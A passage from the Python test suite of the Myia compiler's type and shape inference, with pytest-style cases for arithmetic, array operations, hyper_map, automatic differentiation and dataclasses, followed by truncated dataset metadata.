InferenceError),\n ],\n value=[\n (2, 3, (5, 36))\n ]\n)\ndef test_getattr(x, y):\n a = helpers.add(x, y)\n b = helpers.mul(x, y)\n c = helpers.square(b)\n return a, c\n\n\n@infer(\n type=[\n (i64, i64, T[i64, i64]),\n (i64, f64, T[i64, f64]),\n ]\n)\ndef test_getattr_multitype(x, y):\n a = helpers.add(x, x)\n b = helpers.add(y, y)\n return a, b\n\n\n@infer(\n shape=[\n ((2, 5),),\n ]\n)\ndef test_getattr_shape():\n return data.a25\n\n\n_getattr = getattr\n\n\n@infer(\n type=[\n ({'value': 'add'}, i64, i64),\n ({'value': 'bad'}, i64, InferenceError),\n ({'value': 1234}, i64, InferenceError),\n (External[str], i64, InferenceError),\n ]\n)\ndef test_getattr_flex(name, x):\n return _getattr(helpers, name)(x, x)\n\n\n@infer(type=[\n (External[SimpleNamespace],\n {'type': External[str], 'value': 'surprise'},\n InferenceError)\n])\ndef test_unknown_data(data, field):\n return _getattr(data, field)\n\n\n@infer(type=[(i64, i64, i64), (f64, f64, f64)])\ndef test_method(x, y):\n return x.__add__(y)\n\n\n@infer(type=[(i64, i64, InferenceError)])\ndef test_unknown_method(x, y):\n return x.unknown(y)\n\n\n@infer(type=[(i64, InferenceError)])\ndef test_infinite_recursion(x):\n def ouroboros(x):\n return ouroboros(x - 1)\n\n return ouroboros(x)\n\n\n@infer(type=[(i64, InferenceError)])\ndef test_indirect_infinite_recursion(x):\n def ouroboros(x):\n if x < 0:\n return ouroboros(x - 1)\n else:\n return ouroboros(x + 1)\n\n return ouroboros(x)\n\n\ndef ping():\n return pong()\n\n\ndef pong():\n return ping()\n\n\n@infer(type=[(i64, InferenceError)])\ndef test_infinite_mutual_recursion(x):\n return ping()\n\n\n@infer(type=[({'shape': (2, 3), 'type': ai16}, T[u64, u64])],\n value=[({'shape': (2, 3), 'type': ai16}, (2, 3)),\n ({'shape': (2, ANYTHING), 'type': ai16}, ANYTHING)])\ndef test_shape(ary):\n return shape(ary)\n\n\n@infer(shape=[\n ({'value': Point(2, 3)}, ClassShape({'x': NOSHAPE, 'y': NOSHAPE})),\n ({'value': [np.ones((2, 3)), np.ones((2, 3))]}, ListShape((2, 3))),\n ({'value': [np.ones((2, 2)), np.ones((2, 3))]}, ListShape((2, ANYTHING))),\n])\ndef test_shape2(val):\n return 
val\n\n\n@infer(shape=[(af64_of(2, 3),\n af64_of(3, 4), (2, 4)),\n (af64_of(2),\n af64_of(3, 4), InferenceError),\n (af64_of(2, 2),\n af64_of(3, 4), InferenceError)],\n type=[(af64_of(2, 3),\n af64_of(3, 4), af64)])\ndef test_dot(a, b):\n return dot(a, b)\n\n\n@infer(shape=[(ai32_of(4), {'type': T[u64, u64], 'value': (2, 4)}, (2, 4)),\n (ai32_of(4),\n {'type': T[u64, u64]},\n (ANYTHING, ANYTHING)),\n (ai32_of(4),\n {'type': T[u64, u64], 'value': (5, 2)},\n InferenceError),\n ({'type': ai32, 'shape': (4, 2)},\n {'type': T[u64], 'value': (4,)},\n InferenceError)],\n type=[\n (i32, {'value': (4,), 'type': T[u64]}, InferenceError),\n (ai32_of(1), {'value': (4,), 'type': T[u64]}, ai32),\n (li32, {'value': (4,), 'type': T[u64]}, InferenceError),\n (i32, {'value': (4,)}, InferenceError)\n ])\ndef test_distribute(v, shp):\n return distribute(v, shp)\n\n\n@infer(type=[(ai32_of(3, 7), ai32)],\n shape=[(ai32_of(3, 7), (3, 7)),\n (ai32_of(7), (3, 7)),\n (ai32_of(1), (3, 7)),\n (ai32_of(1, 7), (3, 7)),\n (ai32_of(3), InferenceError)])\ndef test_distribute2(v):\n return distribute(v, (3, 7))\n\n\n@infer(shape=[(af16_of(1, 2, 3), {'type': T[u64], 'value': (6,)}, (6,)),\n (af16_of(1, 2, 3), {'type': T[u64]},\n (ANYTHING,)),\n (af16_of(2, 3), {'type': T[u64], 'value': (7,)},\n InferenceError)],\n type=[(af16_of(2, 3), T[u64], af16),\n (af16_of(2, 3), T[i64],\n InferenceError)])\ndef test_reshape(v, shp):\n return reshape(v, shp)\n\n\n@infer(shape=[(af16_of(6, 7),\n {'type': T[u64, u64], 'value': (1, 0)},\n (7, 6)),\n (af16_of(6, 7),\n {'type': T[u64, u64], 'value': (0, 1)},\n (6, 7)),\n (af16_of(3, 4, 5),\n {'type': T[u64, u64, u64], 'value': (2, 0, 1)},\n (5, 3, 4)),\n (af16_of(3, 4, 5),\n {'type': T[u64, u64, u64]},\n (ANYTHING, ANYTHING, ANYTHING)),\n (af16_of(3, 4, 5),\n {'type': T[u64, u64], 'value': (1, 0)},\n InferenceError),\n (af16_of(3, 4, 5),\n {'type': T[u64, u64], 'value': (1, 0)},\n InferenceError),\n (af16_of(3, 4, 5),\n {'type': T[u64, u64], 'value': (1, 2, 9)},\n InferenceError)],\n type=[(af16_of(2, 3), T[u64, u64], af16),\n (af16_of(2, 3), T[i64, i64], InferenceError)])\ndef test_transpose(v, perm):\n return transpose(v, perm)\n\n\n@infer(shape=[({'type': af32, 'shape': (3, 4)}, (3, 4))],\n type=[({'type': ai64, 'shape': (3, 4)}, ai64),\n ({'type': i64}, InferenceError)])\ndef test_array_map(ary):\n def f(v):\n return v + 1\n return array_map(f, ary)\n\n\n@infer(shape=[(af32_of(3, 4), af32_of(3, 4), (3, 4)),\n (af32_of(3, 4), af32_of(3, 7), InferenceError),\n (af32_of(3, ANYTHING), af32_of(ANYTHING, 7), (3, 7)),\n (af32_of(3, ANYTHING), af32_of(ANYTHING, ANYTHING),\n (3, ANYTHING)),\n (af32_of(3, 4, 5), af32_of(3, 4), InferenceError)],\n type=[(ai64_of(7, 9), ai64_of(7, 9), ai64),\n (ai64_of(7, 9), i64, InferenceError),\n (i64, ai64_of(7, 9), InferenceError)])\ndef test_array_map2(ary1, ary2):\n def f(v1, v2):\n return v1 + v2\n return array_map(f, ary1, ary2)\n\n\n@infer(type=[(InferenceError,)])\ndef test_array_map0():\n def f():\n return 1\n return array_map(f)\n\n\n@infer(shape=[(af32_of(3, 4), af32_of(3, 4), af32_of(3, 4), (3, 4)),\n (af32_of(3, 4), af32_of(3, 4), af32_of(3, 7), InferenceError),\n (af32_of(3, ANYTHING, 5, 6),\n af32_of(3, 4, 5, ANYTHING),\n af32_of(ANYTHING, ANYTHING, ANYTHING, 6),\n (3, 4, 5, 6)),\n (af32_of(3, ANYTHING, 5, 6),\n af32_of(3, 4, 5, ANYTHING),\n af32_of(ANYTHING, ANYTHING, ANYTHING, 7),\n InferenceError),\n (af32_of(3, 4, 5), af32_of(3, 4), af32_of(3, 4),\n InferenceError)],\n type=[(ai64_of(7, 9), ai64_of(7, 9), ai64_of(7, 9), ai64),\n (ai64_of(7, 
9), ai64_of(7, 9), i64, InferenceError),\n (i64, ai64_of(7, 9), ai64_of(7, 9), InferenceError)])\ndef test_array_map3(ary1, ary2, ary3):\n def f(v1, v2, v3):\n return v1 + v2 + v3\n return array_map(f, ary1, ary2, ary3)\n\n\n@infer(shape=[(ai64_of(3, 4), {'value': 1, 'type': u64}, (3, 4))],\n type=[\n (ai64_of(3, 4), {'value': 1, 'type': u64}, ai64),\n ({'type': i64}, {'value': 1, 'type': u64}, InferenceError),\n (af32_of(3, 4), {'value': 1, 'type': u64},\n InferenceError),\n (ai64_of(3, 4), {'value': 1}, InferenceError)\n ])\ndef test_array_scan(ary, ax):\n def f(a, b):\n return a + b\n return array_scan(f, 0, ary, ax)\n\n\n@infer(\n type=[\n (ai64_of(7, 9), T[u64, u64], ai64),\n (ai64_of(7, 9), i64, InferenceError),\n (i64, T[u64, u64], InferenceError),\n ],\n shape=[\n (ai64_of(3, 4),\n {'type': T[u64, u64], 'value': (3, 1)},\n (3, 1)),\n\n (ai64_of(3, 4),\n {'type': T[u64, u64], 'value': (3, ANYTHING)},\n (3, ANYTHING)),\n\n (ai64_of(3, 4),\n {'type': T[u64, u64, u64], 'value': (3, 1, 1)},\n InferenceError),\n\n (ai64_of(3, 4),\n {'type': T[u64, u64], 'value': (4, 1)},\n InferenceError),\n\n (ai64_of(3, 4),\n {'type': T[u64], 'value': (4,)},\n (4,)),\n\n (ai64_of(3, 4),\n {'value': ()},\n ()),\n ]\n)\ndef test_array_reduce(ary, shp):\n def f(a, b):\n return a + b\n return array_reduce(f, ary, shp)\n\n\n@infer_std(\n type=[\n (L[i64], i64, i64),\n (L[i64], f64, InferenceError),\n ],\n shape=[\n ({'type': L[A[i64]], 'shape': ListShape((6, 7))},\n ai64_of(6, 7),\n (6, 7)),\n ({'type': L[A[i64]], 'shape': ListShape((6, 7))},\n ai64_of(6, 17),\n InferenceError)\n ]\n)\ndef test_list_reduce(lst, dflt):\n def f(a, b):\n return a + b\n return list_reduce(f, lst, dflt)\n\n\n@infer(type=[(i64, i64)],\n value=[(40, 42)],\n shape=[({'type': i64}, NOSHAPE)])\ndef test_partial_1(x):\n def f(a, b):\n return a + b\n f2 = myia_partial(f, 2)\n return f2(x)\n\n\n@infer(type=[(i64, i64)])\ndef test_partial_2(x):\n def f(a, b):\n return a + b\n\n def g(c):\n f2 = myia_partial(f, 2)\n f3 = myia_partial(f, -2)\n if c:\n return f2\n else:\n return f3\n return g(x < 42)(x)\n\n\n@infer(type=[(i64, i64)],\n shape=[(ai64_of(6, 13), (6, 13))])\ndef test_identity_function(x):\n return identity(x)\n\n\n@infer(type=[(B, B, B),\n (i64, B, InferenceError),\n (B, i64, InferenceError)])\ndef test_bool_and(x, y):\n return bool_and(x, y)\n\n\n@infer(type=[(B, B, B),\n (i64, B, InferenceError),\n (B, i64, InferenceError)])\ndef test_bool_or(x, y):\n return bool_or(x, y)\n\n\n@infer(\n type=[\n (B, i64, i64, i64),\n (i64, i64, i64, InferenceError),\n (B, i64, f64, InferenceError),\n ({'value': True}, i64, f64, i64),\n ({'value': False}, i64, f64, f64),\n ],\n value=[\n (True, 1, 2, 1),\n (False, 1, 2, 2),\n ({'type': B, 'value': ANYTHING}, 1, 2, ANYTHING),\n ],\n shape=[\n ({'type': B},\n ai64_of(6, 13),\n ai64_of(6, 13),\n (6, 13)),\n\n ({'type': B},\n ai64_of(6, 13),\n ai64_of(6, 14),\n InferenceError),\n\n ({'type': B, 'value': True},\n ai64_of(6, 13),\n ai64_of(6, 14),\n (6, 13)),\n\n ({'type': B, 'value': False},\n ai64_of(6, 13),\n ai64_of(6, 14),\n (6, 14)),\n ]\n)\ndef test_switch(c, x, y):\n return switch(c, x, y)\n\n\n@infer(\n type=[(B, i64, i64)]\n)\ndef test_closure_in_data(c, x):\n def f(x):\n return x * x\n\n def g(x):\n return x + x\n\n a = Thing((1, [f]))\n b = Thing((2, [g]))\n i, h = switch(c, a, b).contents\n return h[0](x)\n\n\n@infer(\n type=[\n (i64, {'value': i64}, i64),\n (i64, {'value': i16}, i16),\n (f64, {'value': i16}, i16),\n (f16, {'value': f32}, f32),\n (f16, TypeType, InferenceError),\n (f16, 
{'value': B}, InferenceError),\n        (B, {'value': f32}, InferenceError),\n    ]\n)\ndef test_scalar_cast(x, t):\n    return scalar_cast(x, t)\n\n\n@infer(type=[(i64, ai64),\n             (f64, af64),\n             (af64_of(9, 7), InferenceError),\n             (T[i64], InferenceError)],\n       shape=[({'type': i64}, ())])\ndef test_scalar_to_array(x):\n    return scalar_to_array(x)\n\n\n@infer(type=[(ai64_of(), i64),\n             (af64_of(), f64)],\n       shape=[(ai64_of(), NOSHAPE),\n              (ai64_of(3, 4), InferenceError),\n              (ai64_of(1, 1, 1), InferenceError)])\ndef test_array_to_scalar(x):\n    return array_to_scalar(x)\n\n\n@infer(type=[\n    (T[u64], T[u64], T[u64]),\n    (T[u64, u64], T[u64], T[u64, u64]),\n    (T[u64], T[u64, u64], T[u64, u64]),\n    (T[i64], T[u64], InferenceError),\n    (T[u64], T[i64], InferenceError),\n    (i64, i64, InferenceError),\n])\ndef test_broadcast_shape(xs, ys):\n    return broadcast_shape(xs, ys)\n\n\n@infer(type=[\n    (i64, i64, InferenceError),\n    (F[[i64], f64], i64, f64),\n    (F[[f64], f64], i64, InferenceError),\n])\ndef test_call_argument(f, x):\n    return f(x)\n\n\n@pytest.mark.xfail(reason=\"ExplicitInferrer generates incomplete vrefs\")\n@infer(type=[\n    (F[[F[[f64], f64]], f64], f64),\n])\ndef test_call_argument_higher_order(f):\n    def g(y):\n        return y + y\n    return f(g)\n\n\n@infer(type=[\n    (i64, i16),\n])\ndef test_unif_tricks(x):\n    # unif1 is i16 or f32\n    # unif2 is i16 or f64\n    # a + b requires same type for a and b\n    # Therefore unif1 and unif2 are i16\n    a = _unif1(x)\n    b = _unif2(x)\n    return a + b\n\n\n@infer(type=[\n    (i64, InferenceError),\n])\ndef test_unif_tricks_2(x):\n    # unif1 is i16 or f32\n    # Both are possible, so we raise an error due to ambiguity\n    a = _unif1(x)\n    return a + a\n\n\n@infer(\n    value=[\n        (2, 3, 4, 90)\n    ],\n    type=[\n        (i64, i64, i64, i64),\n        (f64, f64, f64, InferenceError),\n    ]\n)\ndef test_multitype(x, y, z):\n    return mysum(x) * mysum(x, y) * mysum(x, y, z)\n\n\nmystery = MultitypeGraph('mystery')\n\n\n@mystery.register(ai64, ai64)\ndef _mystery1(x, y):\n    return x @ y\n\n\n@mystery.register(af64, af64)\ndef _mystery2(x, y):\n    return array_map(scalar_add, x, y)\n\n\n@infer(\n    type=[\n        (ai64_of(7, 9), ai64_of(9, 2), ai64),\n        (af64_of(7, 9), af64_of(7, 9), af64),\n        (f64, f64, InferenceError),\n    ],\n    shape=[\n        (ai64_of(2, 5), ai64_of(5, 3), (2, 3)),\n        (af64_of(2, 5), af64_of(5, 3), InferenceError),\n        (ai64_of(2, 5), ai64_of(2, 5), InferenceError),\n        (af64_of(2, 5), af64_of(2, 5), (2, 5)),\n    ]\n)\ndef test_multitype_2(x, y):\n    return mystery(x, y)\n\n\ndef test_forced_type():\n\n    @pipeline_function\n    def mod(self, graph):\n        # Force the inferred type of the output to be f64\n        graph.output.inferred['type'] = f64\n        return graph\n\n    def fn(x, y):\n        return x + y\n\n    pip = infer_pipeline.insert_before('infer', mod=mod)\n\n    for argspec in [[{'type': i64}, {'type': i64}],\n                    [{'type': i64}, {'type': f64}]]:\n\n        results = pip.run(input=fn, argspec=argspec)\n        rval = results['outspec']\n\n        assert rval['type'] == f64\n\n\ndef test_forced_function_type():\n\n    @pipeline_function\n    def mod(self, graph):\n        # Force the inferred type of scalar_add to be (i64,i64)->f64\n        scalar_add = graph.output.inputs[0]\n        scalar_add.inferred['type'] = F[[i64, i64], f64]\n        return graph\n\n    def fn(x, y):\n        return x + y\n\n    pip = infer_pipeline.insert_before('infer', mod=mod)\n\n    # Test correct\n\n    results = pip.run(\n        input=fn,\n        argspec=[{'type': i64}, {'type': i64}]\n    )\n    rval = results['outspec']\n\n    assert rval['type'] == f64\n\n    # Test mismatch\n\n    with pytest.raises(InferenceError):\n        results = pip.run(\n            input=fn,\n            argspec=[{'type': i64}, {'type': 
f64}]\n        )\n\n    # Test narg mismatch\n\n    def fn2(x):\n        return fn(x)\n\n    with pytest.raises(InferenceError):\n        results = pip.run(\n            input=fn2,\n            argspec=[{'type': i64}]\n        )\n\n\n###########################\n# Using standard_pipeline #\n###########################\n\n\n@infer_std(\n    type=[\n        (i64, i64, i64),\n        (ai64_of(7, 9), ai64_of(7, 9), ai64),\n        (ai64_of(7, 9), i64, ai64),\n        (i64, ai64_of(7, 9), ai64),\n        (i64, f64, InferenceError),\n        ({'type': i64, 'value': 3}, ai64_of(7, 9), ai64)\n    ],\n    shape=[\n        (ai64_of(2, 5), ai64_of(2, 5), (2, 5)),\n        (ai64_of(2, 5), ai64_of(2, 1), (2, 5)),\n        (ai64_of(1, 5), ai64_of(2, 1), (2, 5)),\n        (ai64_of(5,), ai64_of(2, 1), (2, 5)),\n        (ai64_of(2, 3, 4), ai64_of(3, 4), (2, 3, 4)),\n        (ai64_of(5,), ai64_of(2,), InferenceError),\n        ({'type': i64}, ai64_of(2, 5), (2, 5)),\n        (ai64_of(2, 5), {'type': i64}, (2, 5)),\n    ]\n)\ndef test_add_std(x, y):\n    return x + y\n\n\n@infer_std(type=[(i64, i64, i64),\n                 (ai64_of(7, 9), i64, InferenceError)])\ndef test_max_std(x, y):\n    if x > y:\n        return x\n    else:\n        return y\n\n\n@infer_std(\n    type=[\n        (f64, f64),\n        (i64, i64),\n        (af32_of(2, 5), af32),\n    ]\n)\ndef test_add1_std(x):\n    return 1 + x\n\n\ndef _add(x, y):\n    return x + y\n\n\n@infer_std(\n    type=[\n        (f64, f64),\n        (i64, i64),\n    ]\n)\ndef test_add1_std_indirect(x):\n    return _add(1, x)\n\n\ndef _interference_helper(x):\n    if hastype(x, T):\n        return x[0]\n    else:\n        return x\n\n\n@infer(\n    type=[\n        (i64, i64),\n        (f64, f64),\n    ]\n)\ndef test_add1_hastype_interference(x):\n    return x + _interference_helper(1)\n\n\n@infer(\n    type=[\n        (f16, f32, f64, f32),\n    ]\n)\ndef test_hastype_interference(x, y, z):\n    if hastype(1, i32):\n        return x\n    elif hastype(1, i64):\n        return y\n    else:\n        return z\n\n\n@infer(\n    type=[\n        (Point_t, i64),\n    ],\n    value=[\n        (Point(3, 4), 7),\n        ({'type': Point_t, 'value': ANYTHING}, ANYTHING),\n    ],\n    shape=[\n        (t(Point_t), NOSHAPE)\n    ]\n)\ndef test_class(pt):\n    return pt.x + pt.y\n\n\n@infer(\n    type=[\n        (Point_t, i64),\n    ],\n    value=[\n        (Point(3, 4), 5),\n    ]\n)\ndef test_dataclass_method(pt):\n    return pt.abs()\n\n\n@infer(\n    type=[\n        (i64, i64, i64, i64, Point_t),\n        (f64, f64, f64, f64, InferenceError),\n    ],\n    value=[\n        (1, 2, 3, 4, Point(4, 6)),\n    ],\n    shape=[\n        (t(i64), t(i64), t(i64), t(i64),\n         ClassShape({'x': NOSHAPE, 'y': NOSHAPE}))\n    ]\n)\ndef test_dataclass_inst(x1, y1, x2, y2):\n    pt1 = Point(x1, y1)\n    pt2 = Point(x2, y2)\n    return Point(pt1.x + pt2.x, pt1.y + pt2.y)\n\n\n@infer(type=[(Point_t, InferenceError)])\ndef test_dataclass_wrong_field(pt):\n    return pt.z\n\n\nhyper_map = HyperMap()\nhyper_map_notuple = HyperMap(nonleaf=(A, Class))\nhyper_map_nobroadcast = HyperMap(broadcast=False)\n\n\n@infer(\n    type=[\n        (i64, i64, i64),\n        (f64, f64, f64),\n        (lf64, lf64, lf64),\n        (L[lf64], L[lf64], L[lf64]),\n        (lf64, f64, InferenceError),\n        (L[f64], L[lf64], InferenceError),\n        (T[i64, f64], T[i64, f64], T[i64, f64]),\n        (Point_t, Point_t, Point_t),\n        (ai64_of(2, 5), ai64_of(2, 5), ai64),\n        (i64, f64, InferenceError),\n        (lf64, f64, InferenceError),\n        (ai64_of(2, 5), af64_of(2, 5), InferenceError),\n    ],\n    value=[\n        (1, 2, 3),\n        (4.5, 7.5, 12.0),\n        (Point(1, 2), Point(3, 4), Point(4, 6)),\n    ],\n    shape=[\n        (ai64_of(2, 5), ai64_of(2, 5), (2, 5)),\n        (ai64_of(2, 5), ai64_of(2, 1), (2, 5)),\n        (ai64_of(2, 5), {'type': i64}, (2, 5)),\n    ]\n)\ndef test_hyper_map(x, y):\n    return hyper_map(scalar_add, x, y)\n\n\n@infer(\n    type=[\n        (T[i64, f64], T[i64, f64], InferenceError),\n    ],\n)\ndef test_hyper_map_notuple(x, y):\n    return hyper_map_notuple(scalar_add, x, y)\n\n\n@infer(\n    shape=[\n        
(ai64_of(2, 5), ai64_of(2, 5), (2, 5)),\n (ai64_of(2, 5), ai64_of(2, 1), InferenceError),\n (ai64_of(2, 5), {'type': i64}, InferenceError),\n ]\n)\ndef test_hyper_map_nobroadcast(x, y):\n return hyper_map_nobroadcast(scalar_add, x, y)\n\n\n@infer(\n type=[\n (i64, i64, i64),\n (f64, f64, f64),\n (lf64, lf64, lf64),\n (T[i64, f64], T[i64, f64], T[i64, f64]),\n (Point_t, Point_t, Point_t),\n (ai64_of(2, 5), ai64_of(2, 5), ai64),\n (Env, Env, Env),\n ],\n value=[\n (1, 2, 3),\n (4.5, 7.5, 12.0),\n (Point(1, 2), Point(3, 4), Point(4, 6)),\n ],\n shape=[\n (ai64_of(2, 5), ai64_of(2, 5), (2, 5)),\n (ai64_of(2, 5), ai64_of(2, 1), (2, 5)),\n (ai64_of(2, 5), {'type': i64}, (2, 5)),\n ]\n)\ndef test_hyper_add(x, y):\n return hyper_add(x, y)\n\n\n@infer(\n type=[\n (i64, i64),\n (f64, f64),\n (lf64, lf64),\n (T[i64, f64], T[i64, f64]),\n (Point_t, Point_t),\n (ai64_of(2, 5), ai64),\n (af32_of(2, 5), af32),\n ],\n value=[\n (1, 0),\n ((2, 3.0), (0, 0.0)),\n (Point(1, 2), Point(0, 0)),\n ],\n shape=[\n (ai64_of(2, 5), (2, 5)),\n (af32_of(2, 5), (2, 5)),\n ]\n)\ndef test_zeros_like(x):\n return zeros_like(x)\n\n\n@infer(type=[(i64, Env)])\ndef test_zeros_like_fn(x):\n def f(y):\n return x + y\n return zeros_like(f)\n\n\n@infer(\n type=[\n (li64, lf64, T[li64, lf64]),\n (li64, f64, InferenceError),\n ]\n)\ndef test_list_map(xs, ys):\n\n def square(x):\n return x * x\n\n return list_map(square, xs), list_map(square, ys)\n\n\n@infer(\n type=[\n (li64, li64, li64),\n (li64, lf64, InferenceError),\n ]\n)\ndef test_list_map2(xs, ys):\n\n def mulm(x, y):\n return x * -y\n\n return list_map(mulm, xs, ys)\n\n\n@infer(type=[(InferenceError,)])\ndef test_list_map0():\n\n def f():\n return 1234\n\n return list_map(f)\n\n\n@infer(\n type=[\n (i32, i32, i32, i32),\n (i32, f32, i32, InferenceError),\n (i32, i32, f32, InferenceError),\n ]\n)\ndef test_env(x, y, z):\n e = newenv\n e = env_setitem(e, embed(x), y)\n return env_getitem(e, embed(x), z)\n\n\n@infer(\n type=[\n (i32, T[JT[i32], Env, i32]),\n (f64, T[JT[f64], Env, f64]),\n ]\n)\ndef test_J(x):\n def f(x):\n return x * x\n\n jf = J(f)\n jx = J(x)\n jy, bprop = jf(jx)\n df, dx = bprop(1.0)\n return jy, df, dx\n\n\n@infer(\n type=[\n (JT[i32], i32),\n (JT[L[i32]], L[i32]),\n (i32, InferenceError),\n ]\n)\ndef test_Jinv(x):\n return Jinv(x)\n\n\n@infer_std(\n type=[\n (i32, i32),\n (f64, f64),\n (ai64_of(4, 5), ai64),\n ],\n shape=[\n (ai64_of(4, 5), (4, 5))\n ]\n)\ndef test_Jinv2(x):\n def f(x):\n return x * x\n\n ff = Jinv(J(f))\n return ff(x)\n\n\n@infer(type=[(i32, InferenceError)])\ndef test_Jinv3(x):\n def f(x):\n return x * x\n return Jinv(f)(x)\n\n\n@infer_std(\n type=[\n (af32_of(5, 7), T[f32, T[Env, af32]]),\n ],\n shape=[\n (af32_of(5, 7),\n TupleShape((NOSHAPE, TupleShape((NOSHAPE, (5, 7))))))\n ],\n)\ndef test_J_array(xs):\n def prod(xs):\n p = array_reduce(lambda x, y: x * y, xs, ())\n return array_to_scalar(p)\n jy, bprop = J(prod)(J(xs))\n return Jinv(jy), bprop(1.0)\n\n\n@infer_std(\n type=[\n (f32, f32, f32),\n (i16, i16, i16),\n ]\n)\ndef test_grad(x, y):\n def f(x, y):\n return x * (y + x)\n return grad(f)(x, y)\n\n\n@infer_std(\n type=[\n (i64, i64),\n (f32, f32),\n (f64, f64),\n ]\n)\ndef test_grad_cast(x):\n def f(x):\n return scalar_cast(x, f16)\n\n return grad(f)(x)\n\n\n@infer_std(\n type=[\n (af16_of(2, 5), af16_of(2, 5), af16),\n ],\n shape=[\n (af16_of(2, 5), af16_of(2, 5), (2, 5)),\n ]\n)\ndef test_grad_reduce(xs, ys):\n def f(xs, ys):\n return array_reduce(scalar_add, xs * ys, ())\n\n return grad(f)(xs, ys)\n", "sub_path": 
"tests/test_infer.py", "file_name": "test_infer.py", "file_ext": "py", "file_size_in_byte": 46722, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "common.ai64", "line_number": 40, "usage_type": "name"}, {"api_name": "common.ai32", "line_number": 44, "usage_type": "name"}, {"api_name": "common.af64", "line_number": 48, "usage_type": "name"}, {"api_name": "common.af32", "line_number": 52, "usage_type": "name"}, {"api_name": "common.af16", "line_number": 56, "usage_type": "name"}, {"api_name": "myia.prim.Primitive", "line_number": 72, "usage_type": "call"}, {"api_name": "inspect.getfullargspec", "line_number": 73, "usage_type": "call"}, {"api_name": "myia.infer.register_inferrer", "line_number": 88, "usage_type": "call"}, {"api_name": "myia.dtype.Int", "line_number": 101, "usage_type": "name"}, {"api_name": "myia.dtype.Float", "line_number": 101, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 104, "usage_type": "name"}, {"api_name": "myia.dtype.Int", "line_number": 116, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 119, "usage_type": "name"}, {"api_name": "myia.utils.RestrictedVar", "line_number": 131, "usage_type": "call"}, {"api_name": "common.i16", "line_number": 131, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 131, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 135, "usage_type": "name"}, {"api_name": "myia.utils.RestrictedVar", "line_number": 144, "usage_type": "call"}, {"api_name": "common.i16", "line_number": 144, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 144, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 148, "usage_type": "name"}, {"api_name": "myia.pipeline.scalar_pipeline.select", "line_number": 151, "usage_type": "call"}, {"api_name": "myia.pipeline.scalar_pipeline", "line_number": 151, "usage_type": "name"}, {"api_name": "myia.pipeline.standard_pipeline.select", "line_number": 163, "usage_type": "call"}, {"api_name": "myia.pipeline.standard_pipeline", "line_number": 163, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 231, "usage_type": "argument"}, {"api_name": "myia.debug.traceback.print_inference_error", "line_number": 232, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 242, "usage_type": "name"}, {"api_name": "myia.debug.traceback.print_inference_error", "line_number": 243, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 246, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 246, "usage_type": "attribute"}, {"api_name": "common.i64", "line_number": 260, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 261, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 262, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 262, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 262, "usage_type": "name"}, {"api_name": "common.B", "line_number": 263, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 263, "usage_type": "name"}, {"api_name": "myia.infer.CONTEXTLESS", "line_number": 268, "usage_type": "name"}, {"api_name": "myia.infer.Contextless.empty", "line_number": 269, "usage_type": "call"}, {"api_name": "myia.infer.Contextless", "line_number": 269, "usage_type": "name"}, {"api_name": "myia.ir.Graph", "line_number": 270, "usage_type": "call"}, 
{"api_name": "myia.ir.Graph", "line_number": 271, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 274, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 280, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 285, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 290, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 295, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 306, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 307, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 309, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 309, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 309, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 310, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 310, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 310, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 311, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 311, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 311, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 313, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 313, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 314, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 314, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 320, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 320, "usage_type": "name"}, {"api_name": "common.B", "line_number": 320, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 320, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 333, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 326, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 326, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 327, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 328, "usage_type": "name"}, {"api_name": "common.af64", "line_number": 329, "usage_type": "name"}, {"api_name": "common.B", "line_number": 330, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 330, "usage_type": "name"}, {"api_name": "common.B", "line_number": 338, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 338, "usage_type": "name"}, {"api_name": "common.B", "line_number": 339, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 339, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 339, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 339, "usage_type": "name"}, {"api_name": 